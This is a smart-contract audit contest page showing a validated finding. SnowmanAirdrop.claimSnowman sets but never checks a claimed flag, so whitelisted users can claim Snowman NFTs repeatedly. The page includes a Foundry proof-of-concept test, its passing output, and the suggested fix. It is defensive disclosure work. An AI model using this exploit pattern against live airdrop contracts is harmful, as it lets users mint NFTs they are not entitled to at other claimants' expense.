Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: low

Valid

`claimSnowman` never checks `s_hasClaimedSnowman`, allowing unlimited double-claims

eliteaja

Description

SnowmanAirdrop.claimSnowman() is designed so that each whitelisted address can claim exactly one Snowman NFT by burning one Snow token, submitting a valid Merkle proof, and providing an EIP-712 signature. The mapping s_hasClaimedSnowman is intended to enforce this one-claim-per-address invariant.
The function sets s_hasClaimedSnowman[receiver] = true after a successful claim but never reads the mapping to block repeat callers. Any user who reacquires Snow tokens can call claimSnowman again with the same proof and receive another NFT.

// src/SnowmanAirdrop.sol

function claimSnowman(

address receiver,

bytes32[] calldata merkleProof,

uint8 v, bytes32 r, bytes32 s

) external nonReentrant {

// @> // missing: if (s_hasClaimedSnowman[receiver]) revert S__AlreadyClaimed();

if (!_isValidSignature(receiver, getMessageHash(receiver), v, r, s))

revert S__InvalidSignature();

if (!_verifyMerkleProof(merkleProof, receiver, SNOW_AMOUNT))

revert S__InvalidProof();

// @> s_hasClaimedSnowman[receiver] = true; // written but never read as a guard

emit SnowmanClaimed(receiver, receiver);

i_snow.safeTransferFrom(receiver, address(this), SNOW_AMOUNT);

i_snowman.mintSnowman(receiver, 1);

}

Risk

Likelihood:

Any whitelisted user who claims once and then calls earnSnow() after one week obtains another Snow token for free, allowing an immediate second claim with zero additional cost.
The re-acquisition cost via buySnow() is bounded only by s_buyFee per token — a small payment compared to receiving an additional NFT, making it economically rational to repeat indefinitely.

Impact:

Whitelisted users can accumulate an unlimited number of Snowman NFTs, inflating NFT supply far beyond the intended one-per-address allocation.
Each repeat claim burns exactly one Snow token per NFT, so the burn mechanism provides no protection once the attacker can freely reacquire Snow.

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console2} from "forge-std/Test.sol";

import {Snow} from "../src/Snow.sol";

import {Snowman} from "../src/Snowman.sol";

import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";

import {MockWETH} from "../src/mock/MockWETH.sol";

import {Helper} from "../script/Helper.s.sol";

/// @notice H-002: s_hasClaimedSnowman is set but never checked — double-claim possible

contract PoC_H002_DoubleClaim is Test {

Snow snow;

Snowman nft;

SnowmanAirdrop airdrop;

MockWETH weth;

bytes32 public ROOT = 0xc0b6787abae0a5066bc2d09eaec944c58119dc18be796e93de5b2bf9f80ea79a;

bytes32 alProofA = 0xf99782cec890699d4947528f9884acaca174602bb028a66d0870534acf241c52;

bytes32 alProofB = 0xbc5a8a0aad4a65155abf53bb707aa6d66b11b220ecb672f7832c05613dba82af;

bytes32 alProofC = 0x971653456742d62534a5d7594745c292dda6a75c69c43a6a6249523f26e0cac1;

bytes32[] AL_PROOF = [alProofA, alProofB, alProofC];

address alice;

uint256 alKey;

function setUp() public {

Helper deployer = new Helper();

(airdrop, snow, nft, weth) = deployer.run();

(alice, alKey) = makeAddrAndKey("alice");

}

function test_poc_H002_double_claim_via_reacquiring_snow() public {

// Alice has 1 Snow from earnSnow() in setUp

assertEq(snow.balanceOf(alice), 1);

// Step 1: Alice approves and claims her Snowman NFT

vm.prank(alice);

snow.approve(address(airdrop), 1);

bytes32 digest = airdrop.getMessageHash(alice);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(alKey, digest);

vm.prank(alice);

airdrop.claimSnowman(alice, AL_PROOF, v, r, s);

assertEq(nft.balanceOf(alice), 1);

assertTrue(airdrop.getClaimStatus(alice), "Alice marked as claimed");

assertEq(snow.balanceOf(alice), 0, "Snow burned after claim");

console2.log(">> First claim succeeded. Alice NFT balance:", nft.balanceOf(alice));

console2.log(">> s_hasClaimedSnowman[alice] = true, but NEVER CHECKED again.");

// Step 2: Alice re-acquires 1 Snow token via earnSnow after 1 week

vm.warp(block.timestamp + 1 weeks);

vm.prank(alice);

snow.earnSnow();

assertEq(snow.balanceOf(alice), 1);

console2.log(">> Alice re-acquired 1 Snow token.");

// Step 3: Alice claims AGAIN with same proof — s_hasClaimedSnowman check MISSING

vm.prank(alice);

snow.approve(address(airdrop), 1);

bytes32 digest2 = airdrop.getMessageHash(alice);

(uint8 v2, bytes32 r2, bytes32 s2) = vm.sign(alKey, digest2);

vm.prank(alice);

airdrop.claimSnowman(alice, AL_PROOF, v2, r2, s2);

assertEq(nft.balanceOf(alice), 2, "Alice claimed twice!");

console2.log(">> SECOND claim succeeded! Alice NFT balance:", nft.balanceOf(alice));

console2.log(">> Double-claim vulnerability confirmed.");

}

Steps to run:

forge test --match-test test_poc_H002_double_claim_via_reacquiring_snow -vv

Output:

[PASS] test_poc_H002_double_claim_via_reacquiring_snow() (gas: 371779)

Logs:

>> First claim succeeded. Alice NFT balance: 1

>> s_hasClaimedSnowman[alice] = true, but NEVER CHECKED again.

>> Alice re-acquired 1 Snow token.

>> SECOND claim succeeded! Alice NFT balance: 2

>> Double-claim vulnerability confirmed.

Recommended Mitigation

Add an already-claimed guard as the first statement in claimSnowman:

+ error S__AlreadyClaimed();

function claimSnowman(

address receiver,

bytes32[] calldata merkleProof,

uint8 v, bytes32 r, bytes32 s

) external nonReentrant {

+ if (s_hasClaimedSnowman[receiver]) revert S__AlreadyClaimed();

if (!_isValidSignature(receiver, getMessageHash(receiver), v, r, s))

revert S__InvalidSignature();

if (!_verifyMerkleProof(merkleProof, receiver, SNOW_AMOUNT))

revert S__InvalidProof();

s_hasClaimedSnowman[receiver] = true;

// ...

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago

Submission Judgement Published

Validated

Assigned finding tags:

[L-01] Missing Claim Status Check Allows Multiple Claims in SnowmanAirdrop.sol::claimSnowman

# Root + Impact   **Root:** The [`claimSnowman`](https://github.com/CodeHawks-Contests/2025-06-snowman-merkle-airdrop/blob/b63f391444e69240f176a14a577c78cb85e4cf71/src/SnowmanAirdrop.sol#L44) function updates `s_hasClaimedSnowman[receiver] = true` but never checks if the user has already claimed before processing the claim, allowing users to claim multiple times if they acquire more Snow tokens. **Impact:** Users can bypass the intended one-time airdrop limit by claiming, acquiring more Snow tokens, and claiming again, breaking the airdrop distribution model and allowing unlimited NFT minting for eligible users. ## Description * **Normal Behavior:** Airdrop mechanisms should enforce one claim per eligible user to ensure fair distribution and prevent abuse of the reward system. * **Specific Issue:** The function sets the claim status to true after processing but never validates if `s_hasClaimedSnowman[receiver]` is already true at the beginning, allowing users to claim multiple times as long as they have Snow tokens and valid proofs. ## Risk **Likelihood**: Medium * Users need to acquire additional Snow tokens between claims, which requires time and effort * Users must maintain their merkle proof validity across multiple claims * Attack requires understanding of the missing validation check **Impact**: High * **Airdrop Abuse**: Users can claim far more NFTs than intended by the distribution mechanism * **Unfair Distribution**: Some users receive multiple rewards while others may receive none * **Economic Manipulation**: Breaks the intended scarcity and distribution model of the NFT collection ## Proof of Concept Add the following test to TestSnowMan.t.sol ```Solidity function testMultipleClaimsAllowed() public { // Alice claims her first NFT vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest = airdrop.getMessageHash(alice); (uint8 v, bytes32 r, bytes32 s) = vm.sign(alKey, aliceDigest); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v, r, s); assert(nft.balanceOf(alice) == 1); assert(airdrop.getClaimStatus(alice) == true); // Alice acquires more Snow tokens (wait for timer and earn again) vm.warp(block.timestamp + 1 weeks); vm.prank(alice); snow.earnSnow(); // Alice can claim AGAIN with new Snow tokens! vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest2 = airdrop.getMessageHash(alice); (uint8 v2, bytes32 r2, bytes32 s2) = vm.sign(alKey, aliceDigest2); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v2, r2, s2); // Second claim succeeds! assert(nft.balanceOf(alice) == 2); // Alice now has 2 NFTs } ``` ## Recommended Mitigation **Add a claim status check at the beginning of the function** to prevent users from claiming multiple times. ```diff // Add new error + error SA__AlreadyClaimed(); function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s) external nonReentrant { + if (s_hasClaimedSnowman[receiver]) { + revert SA__AlreadyClaimed(); + } + if (receiver == address(0)) { revert SA__ZeroAddress(); } // Rest of function logic... s_hasClaimedSnowman[receiver] = true; } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!